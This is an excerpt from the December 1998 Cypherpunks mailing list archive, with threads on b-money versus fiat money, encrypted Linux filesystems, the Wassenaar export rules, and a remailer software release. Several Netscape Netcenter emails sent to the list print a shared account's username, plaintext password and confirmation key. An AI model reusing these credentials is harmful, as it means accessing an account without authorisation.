> which is that there's no reason anybody should want to accept it,
> any more than they should want to accept dead-president fiat paper money.
> It fixes some symptoms of fiat money, but not the fundamental problem,
> because it's still fiat money, just with mathematically interesting 
> artwork printed on the front.

This argument is based on the misconception that people have no reason to
want to accept fiat money. But actually fiat money is valuable because it
performs a service for those who use it, namely the service of a medium of
exchange. It's value derives from the fact that there is positive demand
for a medium of exchange, and the fact that its supply is finite and
controlled by a sufficiently benevolent agency.

Think about it this way. In the case of commodity money, its value comes
partly from the industrial/aesthetic value of the commodity and partly
from the usefulness of the commodity money as a medium of exchange. In the
case of fiat money and b-money, all of its value comes from its usefulness
as a medium of exchange.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joel boutros <jdb@layer8.net>
Date: Sat, 12 Dec 1998 07:53:06 +0800
To: cypherpunks@toad.com
Subject: Re: Linux Encrypted File Sytem
In-Reply-To: <XFMail.981211124103.mikeg@soonernet.com>
Message-ID: <19981211150128.A9434@layer8.net>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, Dec 11, 1998 at 01:45:55PM -0600, Igor Chudov @ home wrote:
> Did you try CFS? It does not require any patches to the kernel or 
> the mount program.

CFS encrypts files and directory names individually, rather than
filesystems as a whole, allowing the user to infer directory structure
by examining the encrypted store.  It also does really badly if you
expect to use it with more than one user.

In addition, the documentation (last I looked) pretty clearly says
not to use it in a multiuser environment.

TCFS makes extensions upon CFS.  I don't know how well it does, though,
or whether it fixes the problems listed above.  I've only heard it
described in the context of a suggested alternative.

There are apparently several others, whose names I don't know,
unfortunately.  I've not looked at them.

- joel "No real content, just a comment or two"

> 
> igor
> 
> Mike Gorsuch wrote:
> > 
> > 
> > Hey guys,
> > 
> > I'm hoping that you guys can point me in the right direction.  I have become
> > very interested in the idea of an encrypted file system, rather than encrypting
> > individual files.  I read an article in the Linux Journal that talked about how
> > to give Linux the support.  Well, first I had to get the source for an older
> > kernel, 2.0.30, and use the patches.  It patched and compiled fine. Next I was
> > supposed to patch mount.  The problem I am facing is that the mount source will
> > not take the patch right.  
> > 
> > If anyone can help me on these two issues I would be very happy:
> > 
> > 1) What source version of mount do I need to use?
> > 
> > 2) Is there a way to get kernel 2.0.35 or later to use this support?
> > 
> > Mike
> > 
> > 
> > -----------------------------------------------------------------------------
> > "The Darkest Hour is Always Just Before Dawn..."
> > 
> > Mike Gorsuch
> > aka Wulfgang
> > ICQ UIN 670820
> > email: mikeg@soonernet.com
> > Web Page: http://www.geocities.com/Area51/Rampart/6071
> > ------------------------------------------------------------------------------
> > 
> 
> 
> 
> 	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netcenter-reg@netscape.com (Netcenter Registration)
Date: Sat, 12 Dec 1998 08:09:55 +0800
To: cypherpunks@toad.com
Subject: Netcenter member information
Message-ID: <199812112304.PAA13597@ureg3.netscape.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Monica Lewinsky,

You have received this email because you had requested a new Netcenter 
password. In order to protect your account, we urge you to change your 
password after you login using the password specified below.

    username=cpunksusa
    password=shyfire551

To change your password, visit the Netcenter Member Center at the 
following location: 

    http://home.netscape.com/netcenter/membercenter.html

You may be asked to sign in, and then to log in using the password above.
Then just click on the "password" link in the left column, and follow the
instructions to change your password. When you're done, click the "update"
button, and you can start using your new password right away.

Thanks, 
  
Netcenter Registration

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netcenter-reg@netscape.com (Netcenter Registration)
Date: Sat, 12 Dec 1998 08:41:34 +0800
To: cypherpunks@toad.com
Subject: NETCENTER uid=cpunksusa key=cnO6Eb3peBen CONFIRM!
Message-ID: <199812112324.PAA14737@ureg3.netscape.com>
MIME-Version: 1.0
Content-Type: text/html


 

Dear Monica Lewinsky, 

Welcome to Netcenter! In order to gain full access to Netcenter
member services, please CONFIRM that this is your correct email
address by replying to this message within 48 hours.

You can reply by:

1. Clicking Reply and Send to return this email to Netcenter
               
      OR

2. If you CAN YOU SEE THE IMAGE BELOW, just click on the image to
   confirm your account.

<A HREF=
http://ureg.netscape.com/iiop/UReg2/mailback/confirm_email_form?uid=cpunksusa&key=cnO6Eb3peB&U2_CS=iso-8859-1&U2_LA=en>


If you did not request this account, do not respond. Simply delete
this message from your mailbox. If you do not respond, your account
will not be activated. 


Thank You! 

Netcenter Registration 







 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netcenter-reg@netscape.com (Netcenter Registration)
Date: Sat, 12 Dec 1998 08:55:23 +0800
To: cypherpunks@toad.com
Subject: Welcome to Netcenter
Message-ID: <199812112325.PAA14865@ureg3.netscape.com>
MIME-Version: 1.0
Content-Type: text/html

Title: Welcome to Netscape Netcenter















 
 
 



Netsearch 

|  Webmail   |   Personalize  

|   Member Directory 

  






Dear Monica Lewinsky, 


Welcome to Netscape Netcenter, where you can access all the Internet services you need in one convenient location.  With your FREE enrollment in Netscape Netcenter, you're joining millions of others who've already discovered the Internet's best resource for software, content, commerce, and community.   
 

YOUR FREE EMAIL
ACCOUNT  
As a bonus, we have automatically
reserved for you your own private Netscape WebMail account:  
Netscape WebMail accounts, provided
free to all Netcenter members, are accessible from any computer with internet
access. Click
here to activate your WebMail account.  

IMPORTANT MEMBERSHIP
INFORMATION  
Each time you visit us at Netscape
Netcenter, you may need to enter your user name and password.  Please
keep a copy of this information in a safe place for future reference. 
You now can access Netscape Netcenter from anywhere you have an Internet
connection.  
Your User Name is: cpunksusa 
<!--
Your Password is: ^U2Password^  
-->
<!--
To edit your personal profile or
registration information, click
here.  
-->

BEST OF THE NET 
With your Netscape Netcenter
membership, you'll be able to take advantage of a broad variety of
business and consumer channels like news, sports and personal finance;
outstanding products from leading companies such as Music Boulevard, Travelocity,
Amazon.com, and FTD; and integrated services like personalization to give
you the information you want, when you want it.  

And, there's more! We'll send
you a periodic email newsletter featuring all the latest information
on the specials, services and products available to you. It will
keep you informed of the frequent updates and new services being added to Netcenter. 

Thank you for becoming a member
of Netscape Netcenter, your home on the Net.

http://home.netscape.com/netcenter  

The Netcenter Team 
Netscape respects your online time and Internet privacy. This welcome letter is a one-time only mailing. If you would like to subscribe or unsubscribe to other Netscape or partner mailings, please visit our In-Box Direct service. 
Copyright
(c) 1998. Netscape Communications
Corporation. All rights reserved. 



 










 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Gorsuch <mikeg@soonernet.com>
Date: Sat, 12 Dec 1998 06:55:33 +0800
To: (Igor Chudov @ home) <ichudov@Algebra.COM>
Subject: Re: Linux Encrypted File Sytem
In-Reply-To: <199812111945.NAA16936@manifold.algebra.com>
Message-ID: <XFMail.981211154447.mikeg@soonernet.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks!  I appreciate the quick response.  Where can I get CFS?

Mike

On 11-Dec-98 Igor Chudov @ home wrote:
> Did you try CFS? It does not require any patches to the kernel or 
> the mount program.
> 
> igor
> 
> Mike Gorsuch wrote:
>> 
>> 
>> Hey guys,
>> 
>> I'm hoping that you guys can point me in the right direction.  I have become
>> very interested in the idea of an encrypted file system, rather than
>> encrypting
>> individual files.  I read an article in the Linux Journal that talked about
>> how
>> to give Linux the support.  Well, first I had to get the source for an older
>> kernel, 2.0.30, and use the patches.  It patched and compiled fine. Next I
>> was
>> supposed to patch mount.  The problem I am facing is that the mount source
>> will
>> not take the patch right.  
>> 
>> If anyone can help me on these two issues I would be very happy:
>> 
>> 1) What source version of mount do I need to use?
>> 
>> 2) Is there a way to get kernel 2.0.35 or later to use this support?
>> 
>> Mike
>> 
>> 
>> -----------------------------------------------------------------------------
>> "The Darkest Hour is Always Just Before Dawn..."
>> 
>> Mike Gorsuch
>> aka Wulfgang
>> ICQ UIN 670820
>> email: mikeg@soonernet.com
>> Web Page: http://www.geocities.com/Area51/Rampart/6071
>> -----------------------------------------------------------------------------
>> -
>> 
> 
> 
> 
>       - Igor.

-----------------------------------------------------------------------------
"The Darkest Hour is Always Just Before Dawn..."

Mike Gorsuch
aka Wulfgang
ICQ UIN 670820
email: mikeg@soonernet.com
Web Page: http://www.geocities.com/Area51/Rampart/6071
------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 12 Dec 1998 07:13:11 +0800
To: mikeg@soonernet.com
Subject: Re: Linux Encrypted File Sytem
In-Reply-To: <XFMail.981211154447.mikeg@soonernet.com>
Message-ID: <199812112154.PAA19547@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Ask Matt Blaze, cfs@research.att.com

igor

Mike Gorsuch wrote:
> 
> Thanks!  I appreciate the quick response.  Where can I get CFS?
> 
> Mike
> 
> On 11-Dec-98 Igor Chudov @ home wrote:
> > Did you try CFS? It does not require any patches to the kernel or 
> > the mount program.
> > 
> > igor
> > 
> > Mike Gorsuch wrote:
> >> 
> >> 
> >> Hey guys,
> >> 
> >> I'm hoping that you guys can point me in the right direction.  I have become
> >> very interested in the idea of an encrypted file system, rather than
> >> encrypting
> >> individual files.  I read an article in the Linux Journal that talked about
> >> how
> >> to give Linux the support.  Well, first I had to get the source for an older
> >> kernel, 2.0.30, and use the patches.  It patched and compiled fine. Next I
> >> was
> >> supposed to patch mount.  The problem I am facing is that the mount source
> >> will
> >> not take the patch right.  
> >> 
> >> If anyone can help me on these two issues I would be very happy:
> >> 
> >> 1) What source version of mount do I need to use?
> >> 
> >> 2) Is there a way to get kernel 2.0.35 or later to use this support?
> >> 
> >> Mike
> >> 
> >> 
> >> -----------------------------------------------------------------------------
> >> "The Darkest Hour is Always Just Before Dawn..."
> >> 
> >> Mike Gorsuch
> >> aka Wulfgang
> >> ICQ UIN 670820
> >> email: mikeg@soonernet.com
> >> Web Page: http://www.geocities.com/Area51/Rampart/6071
> >> -----------------------------------------------------------------------------
> >> -
> >> 
> > 
> > 
> > 
> >       - Igor.
> 
> -----------------------------------------------------------------------------
> "The Darkest Hour is Always Just Before Dawn..."
> 
> Mike Gorsuch
> aka Wulfgang
> ICQ UIN 670820
> email: mikeg@soonernet.com
> Web Page: http://www.geocities.com/Area51/Rampart/6071
> ------------------------------------------------------------------------------
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 12 Dec 1998 09:14:57 +0800
To: cypherpunks@cyberpass.net
Subject: Re: alternative b-money creation
In-Reply-To: <3.0.5.32.19981211022710.008c0100@idiom.com>
Message-ID: <v0313030ab29764c39899@[209.66.100.84]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:56 PM -0800 12/11/98, Wei Dai wrote:
...
>
>This argument is based on the misconception that people have no reason to
>want to accept fiat money. But actually fiat money is valuable because it
>performs a service for those who use it, namely the service of a medium of
>exchange. It's value derives from the fact that there is positive demand
>for a medium of exchange, and the fact that its supply is finite and
>controlled by a sufficiently benevolent agency.
>
>Think about it this way. In the case of commodity money, its value comes
>partly from the industrial/aesthetic value of the commodity and partly
>from the usefulness of the commodity money as a medium of exchange. In the
>case of fiat money and b-money, all of its value comes from its usefulness
>as a medium of exchange.

I believe _all_ forms of money, whether hard, fiat, whatever, come from the
expectation that the money will be of the same value, more or less, in the
future.

Call it the "greater fool theory of money." All one cares about is that a
greater fool will take the money.

Whether the money is gold or funny bank notes or e-money, the Bayesian
expectation of future value is what matters. Discounted appropriately for
interest paid, etc. (Thus, one might be willing to be paid in gold coins or
in E-Bay LEAPs, provided the terms were laid-out and could be calculated.)

As always, reputation is critical.  Repution = Belief = Expectation.

--Tim May



Y2K -- LMGALMAO -- Loading my guns and laughing my ass off
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 12 Dec 1998 09:37:58 +0800
To: cypherpunks@cyberpass.net
Subject: Re: alternative b-money creation
In-Reply-To: <19981211135656.A13424@eskimo.com>
Message-ID: <19981211162940.C22476@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, Dec 11, 1998 at 06:48:05PM -0400, Ian Grigg wrote:
> It is true that there is positive demand for a medium of
> exchange.
> 
> It is not true that fiat money is controlled by a
> sufficiently benevolent agency, and it is patently
> not true that there is a finite supply.

What I meant is that the current supply of money (i.e. the total amount of
money in circulation) is finite, not that it can't increase in the future.
And by sufficiently benevolent, I mean people do not expect the government
to print so much money that it becomes totally worthless, at least not in
the short term.

I'm not trying to defend fiat money. After all I proposed b-money as an
alternative exactly because fiat money does have serious problems. But
having no reason for people to accept it is not one of them. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wilson, Jamie (J.R.)" <jwilso37@visteonet.com>
Date: Sat, 12 Dec 1998 06:51:47 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Postcard Debates
Message-ID: <199812112135.QAA13074@mailfw2.ford.com>
MIME-Version: 1.0
Content-Type: text/plain



Back to a previous question: how do we get the public to understand the
concept of an "electronic envelope", the ACLU has created a PDF file that
prints to a brochure format explaining encryption on a level that even the
novice of users can understand.  It is available at
http://www.aclu.org/action/tools/crypto.pdf.

____________________________________________________
Jamie R. Wilson                     




-----Original Message-----
From: Joel O'Connor [mailto:ogrenivek@yahoo.com]
Sent: Friday, 11 December, 1998 12:47
To: Wilson, Jamie (J.R.)
Cc: cypherpunks@toad.com
Subject: RE: Postcard Debates


Deep. . .mad deep.  I completely agree, does anyone know of any such
laws regarding e-mail?




---"Wilson, Jamie (J.R.)" <jwilso37@visteonet.com> wrote:
>
> If everyone just encrypted their messages then no suspicions would
be raised
> regarding the use of encryption.  Most people use envelopes, plain and
> simple -- and as a result no one questions what they are hiding.  It's
> understood that mail is private and therefore people have a right to
seal it
> in an envelope and not worry about people tampering with it.  On the
same
> note, there are federal regulations and penalties (in the U.S.
anyway) for
> tampering with mail and interrupting the delivery of it.  The same
laws
> should apply to email.
> 
> ____________________________________________________
> Jamie R. Wilson                     
> 
> 
> 
> -----Original Message-----
> From: Robert Wenzler [mailto:rwenzler@usachoice.com]
> Sent: Thursday, 10 December, 1998 13:56
> To: Mbishop645@aol.com
> Cc: maven@weirdness.com; hab@gamegirlz.com; Cypherpunks@toad.com
> Subject: Re: 
> 
> 
> 
> 
> Mbishop645@aol.com wrote:
> > 
> > >HaB wrote:
> > ><snip>
> > >>     That's a good place to begin, though.  "Would you send a
letter to
> > >> someone without an envelope?"  "Then why not put your email in
the
> > >> electronic equivalent of one?"
> > >>
> > >> balance.
> > >
> > >Would I send a letter to someone without an envelope?
> > >One word: postcard.
> > 
> > Ahh, but would you tape a check for your phone bill to a postcard?
Other
> > than writing a greeting to someone what else do you use a postcard
for?
> 
> No, I would not tape a phone bill check to a postcard. There is the 
> chance for it to fall off.
> 
> There is different methods of sending mail for different levels of
> security and functionality. Some people make it obvious what is inside
> an envelope. (who would not recognize a Christmas card from the
> envelope?) Others make it as bland and normal as possible to
> have it go by without much notice.
> 
> It all depends on how secure you want it. Some things you can do
> with what amounts to postcard security.
> 
> What amount of security do you want for your email? Would you be
> willing to do something extra for that security?
> 
> This type of question is up to each person. How much risk is the
> person willing to take. Each person has the responsibility to
> understand what the risks are and to decide what risks they are
> willing to take.
> 

==
Ogre bounces like sonar. . .Peace.
                  Ogre

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Sat, 12 Dec 1998 01:22:04 +0800
To: cypherpunks@cyberpass.net
Subject: Test
Message-ID: <36714505.B04FB3DF@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



please ignore this.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 12 Dec 1998 08:18:52 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: German government press release on Wassenaar (fwd)
Message-ID: <199812112328.RAA31629@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 11 Dec 1998 22:50:04 +0100
> From: Alexander Kjeldaas <astor@guardian.no>
> Subject: Re: German government press release on Wassenaar

> I applied for an examination of the Open Source definition to the
> department for foreign affairs in Norway.  The response (no surprise)
> was that Open Source is compliant with what the Wassenaar-agreement
> calls "public domain" software.

Actualy that is surprising since Open Sourse does not imply the loss of
rights by the author as public domain does.

If this is so and Germany interprets Open Source in this way then the OS
movement will fail in Germany (at least). There will be no motive for
authors to release their work since they will be in effect releasing all
rights to it, not the goal of OS at all. The impact on this for closed source
derivitive products is also of some interest.

I wonder what RMS will have to say on that one...


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Sheriff <sheriff@speakeasy.org>
Date: Sun, 13 Dec 1998 01:34:24 +0800
To: "William H. Geiger III" <webmaster@max-web.com>
Subject: Re: Global Strike to protest Wassenaar
In-Reply-To: <3.0.6.32.19981210163644.0088ec30@max-web.com>
Message-ID: <v04003a02b29741b7c80e@[150.160.14.83]>
MIME-Version: 1.0
Content-Type: text/plain



>>Not only will Maximum Web Design (www.max-web.com) not be operating on
>>December 14, I have plenty of bandwith for a page with all the
>>participants. Would be happy to maintain it too...
>
>>Please e-mail me. anti-wassenaar@max-web.com
>
>>Only serious requests -=WITH A URL=- will be accepted.
>>Will post the address to the list asap.
>
>The domain of openpgp.net will be down in protest on the 14th. Perhaps
>someone could design a common webpage that we all could use outlining why
>our sites are down.

If some of y'all out there would go ahead and post some of your
reasons for "striking," I'll be more than happy to air it on my
web page.  Try to post these to the list [ATTN: Sheriff] by
the 12th, or the 13th at the latest.  All such posts will be
slapped up on my web page, at the URL mentioned in my sig.  Cheers.

Love, luck, and marijuana lollipops,
The Sheriff. -- ***<REPLY TO: sheriff@speakeasy.org>***
---   **** New, SHORTER sig!  See below! ****
*********************************************************
***                 Questions?                        ***
*** Finger sheriff@speakeasy.org for RSA key and ICQ. ***
***                                                   ***
***           Haven't seen my web site?               ***
*** http://www.speakeasy.org/~sheriff/DISCLAIMER.html ***
*********************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Antonomasia <ant@notatla.demon.co.uk>
Date: Sat, 12 Dec 1998 02:48:24 +0800
To: cypherpunks@Algebra.COM
Subject: angel 0.5 released
Message-ID: <199812111811.SAA04005@notatla.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




My website (software page) should have angel 0.5 on it at around
midnight (GMT).  This is a mail transfer agent intended to operate
well with remailers.

Progress since the last release is taking the DH key authentication to
a different program so that the RSA secion when added will not be in the
main server (angeld).  RSA authentication of the DH key is still to be added.


--
##############################################################
# Antonomasia   ant@notatla.demon.co.uk                      #
# See http://www.notatla.demon.co.uk/                        #
##############################################################




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 12 Dec 1998 02:44:28 +0800
To: dbs@philodox.com
Subject: Re: alternative b-money creation
Message-ID: <199812111722.SAA29143@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart writes, regarding Wei Dai's b-money protocol:

> It still doesn't solve the fundamental problem with the b-money idea,
> which is that there's no reason anybody should want to accept it,
> any more than they should want to accept dead-president fiat paper money.
> It fixes some symptoms of fiat money, but not the fundamental problem,
> because it's still fiat money, just with mathematically interesting 
> artwork printed on the front.

B-money is not fiat money.  It is better to think of it as commodity
money.  Unlike most commodity money, in this case the commodity is not
intrinsically valuable.  However it is scarce, and more can be created
only at a considerable cost.  An analogy might be money based on a rare
earth element like Terbium (which, let's suppose, has no industrial uses).
Terbium based money would be immune to inflation, like gold backed money,
but the element is not valuable in itself; it is only valuable for its
role as money.

This leads to an important difference between b-money and fiat money.
The value of b-money is not set by fiat.  The value is determined
automatically by the workings of the market and the workings of the
protocol.

There is no centralized agency to make b-money legal tender, or to set
its value in terms of other currencies.  Most importantly, there is no
agency which can issue new b-money, inflating and devaluing the currency.

Money is a store of value and a medium of exchange.  B-money is admirably
suited for these purposes, much better than fiat money.  The quantity of
b-money in a mature system is, roughly speaking, constant.  (The quantity
may grow, but it will do so slowly, based on the increased demand for
b-money.)  B-money is an investment which will hold its value.  Because
it can be exchanged electronically, it is much more flexible as a medium
of exchange than existing forms of money.

> One of the big problems with fiat money is that someone who
> can get other people to trade it for real goods has an
> incentive to print lots of it and acquire a very large share
> of the real goods in the economy, leaving the rest of the people
> with unredeemable artwork and only able to get their share
> of goods by giving the fiatmeister labor or other real goods.
> 
> Wei Dai's b-money proposals reduce the incentive to create
> lots of b-money by requiring the creator to burn lots of
> valuable CPU time to create the mathematical artwork on the notes,

Think of this CPU-burning as the effort to mint or mine new b-money.
Like other commodity based money, and unlike fiat money, b-money cannot
be printed.  New b-money can only be added to the money supply by virtue
of expending work.  This is what insures that there is no inflation.

> In some ways, it's even _worse_ than traditional fiat money,
> because creating it uses up CPU time that could otherwise be
> calculating things that have value for the rest of the economy,
> like optimizing airline routes or circuit-board designs,
> or less valuable cool things like rendering bug pictures for movies
> or calculating the next Mersenne prime or cracking MongoBank's keys,
> or, well, drawing space-war pictures real fast on your Nintendo.

You could say the same thing about gold mining, in the days when gold
was money.  Most gold went into circulation as coins, not adding beauty
or value to the economy.  Its only utility was as an increase in the money
supply.

But, of course, adding to the money supply is an important contribution.
To have a stable commodity money, it must be costly to create more,
and the cost must be "wasteful" in the sense that it is not compensated
other than by the monetary value of the newly produced money.  Otherwise
you will get excessive inflation.

It's ironic for people to complain that b-money is inferior, in a world
in which fiat money is universal.  Once the mathematics of b-money are
better established and understood, and once the technical issues are
clarified and problems solved, this appears to be a very attractive
alternative to fiat money.  Unlike commodities such as gold, it can be
easily exchanged electronically.  And unlike fiat money, it is immune
to attempts to manipulate the money supply.

B-money could easily attract investment as an inflation-proof store of
value.  This may be enough to initiate the bootstrapping process.  People
can buy b-money as a store of value, and once they hold it they will want
to be able to spend it.  This will lead to a demand for merchants to
accept it, and the process has begun.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 12 Dec 1998 08:19:15 +0800
To: cypherpunks@cyberpass.net
Subject: Hayek Quote of the Week
Message-ID: <v04020a03b2975c7af0bf@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Mime-Version: 1.0
X-Sender: rah@pop.sneaker.net
Date: Fri, 11 Dec 1998 17:59:16 -0500
To: Digital Bearer Settlement List <dbs@philodox.com>
From: Robert Hettinga <rah@shipwright.com>
Subject: Hayek Quote of the Week
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/

While we're at it...

Cheers,
Robert Hettinga

--- begin forwarded text


Date:         Fri, 11 Dec 1998 17:19:31 EST
Reply-To: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
Sender: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
From: Hayek-L List Host <HayekList@AOL.COM>
Subject:      Hayek Quote of the Week
To: HAYEK-L@MAELSTROM.STJOHNS.EDU

         Hayek Quote of the Week


" .. history is largely a history of inflation,
and usually of inflations engineered by
governments and for the gain of governments .. "


F. A. Hayek, _Denationalisation of Money: The
Argument Refined_ (third edition)  London: Institute
of Economic Affairs.  1990.  p. 34



Hayek Quote of the Week is a regular feature of the Hayek-L list.



>> END  <<

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Sat, 12 Dec 1998 10:12:06 +0800
To: cypherpunks@toad.com
Subject: Wassenaar Discussion...
Message-ID: <Pine.BSF.3.96.981211184228.11824F-100000@greeves.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain



I thought the list might be interested to know that we have in fact had
"more than a few" angry emails about being down on the 14th: hit-em where
it hurts, and they *have* to listen, huh?  For the most part, the response
has been favorable, *after* they have been educated as to what is going
on.  These are the same people who, by and large, could care less about
the average "political thing"...

As I said before, I acknowledge that this "strike" takes out it's energy
on those least responsible (directly, anyway), but it *does* seem to wake
them up, since it directly involves them [now]...

Anyone else having similar experiences? (I'm really curious about
openpgp.net)

Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Grigg <iang@systemics.com>
Date: Sat, 12 Dec 1998 07:40:48 +0800
To: weidai@eskimo.com
Subject: Re: alternative b-money creation
In-Reply-To: <19981211135656.A13424@eskimo.com>
Message-ID: <199812112248.SAA21792@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain



> This argument is based on the misconception that people have no reason to
> want to accept fiat money. But actually fiat money is valuable because it
> performs a service for those who use it, namely the service of a medium of
> exchange. It's value derives from the fact that there is positive demand
> for a medium of exchange, and the fact that its supply is finite and
> controlled by a sufficiently benevolent agency.

It is true that there is positive demand for a medium of
exchange.

It is not true that fiat money is controlled by a
sufficiently benevolent agency, and it is patently
not true that there is a finite supply.

National monies are in effect, and in demand, because
they are mandated by a number of methods.  The us$ was
made the dominant form by punitive taxation of alternates
in the late 1900s.  Other countries like the UK managed
to destroy competitors, and in the course of this, bankrupt
honest note issuers, by subjecting the note issuers to

The notion that the current issuer of that money
is benevolent is easily tested by circulating alternate
monies.  Any casino in the US will tell you that the reason
they won't permit their chips to go outside is because the
feds have quiet words with them.  Disregarding journalistic
fairy tales like Hiawatha Hours (or whatever they were called),
pretty universally, you run the risk of being locked up if
you circulate something called money.

Of course, the Internet has changed all this.  But not as
much as you'd think, I'd lay 10 to 1 that if you started
an issuer of Internet money on the wrong side of the German
border you'd be finding out what bored prison guards talk
about.

The Federal Reserve of the US has said fairly plainly that
you can do this.  But the ABA, FinCen, the FBI, the DEA,
and any other moralistic department of the US government
that wants to get in the act are going to be looking at
this with jaundiced eyes.

The value of any monopolistic product can be simplistically
stated to be driven by supply and demand, but the truth is
different.  Only when there is free issue of money will we
know if a government can compete against the best and brightest
of the profit minded world.  In the past, the answer was a
resounding No, as otherwise, governments would not have had
to resort to legislation, taxes and other arbitrary punishments
in order to win the field.

> Think about it this way. In the case of commodity money, its value comes
> partly from the industrial/aesthetic value of the commodity and partly
> from the usefulness of the commodity money as a medium of exchange. In the
> case of fiat money and b-money, all of its value comes from its usefulness
> as a medium of exchange.

And a government enforced monopoly.  The value of that is
calculated at the seignorage, assuming that we agree that
no government could compete on fair grounds.  That makes
the US monopoly worth $25 Bn per annum.

iang




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Sat, 12 Dec 1998 02:56:53 +0800
To: cypherpunks@cyberpass.net
Subject: 2nd reposting of a response to Jim Choate (on crypto archives)
Message-ID: <36715BFD.8B6EB309@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Note: There was some technical problem since yesterday to cypherpunks
postings, so that my posts to the list didn't result in copies back to 
me. This morning I reposted these, again without success. An hour
ago Igor Chudov informed me that the problem was solved and I have
just verified this with a test message. I am therefore reposting 
once again one of my posts of yesterday here. It is a response to 
Jim Choate. Please ignore it if you have already seen it.

Jim Choate wrote:
> 

> > From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
> 
> > We were talking about a site that has to be closed because of (new)
> > crypto laws, not technically down which is seldom with modern hardware.
> > And also you said that money is no problem!
> 
> You need to go back and re-read what prompted this. Your responce is
> completely out of context.
> 
> > Why you care so much about people who voluteer to run sites? They
> > certainly know what kind of risks that they probably face, financial
> > or otherwise. Do you care your neighbour who opens up a new company
> > and do you feel unconditionally have to give him advices?? Are you
> > the one who is cleverer than all the others?
> 
> It depends, do I shop there?
> 
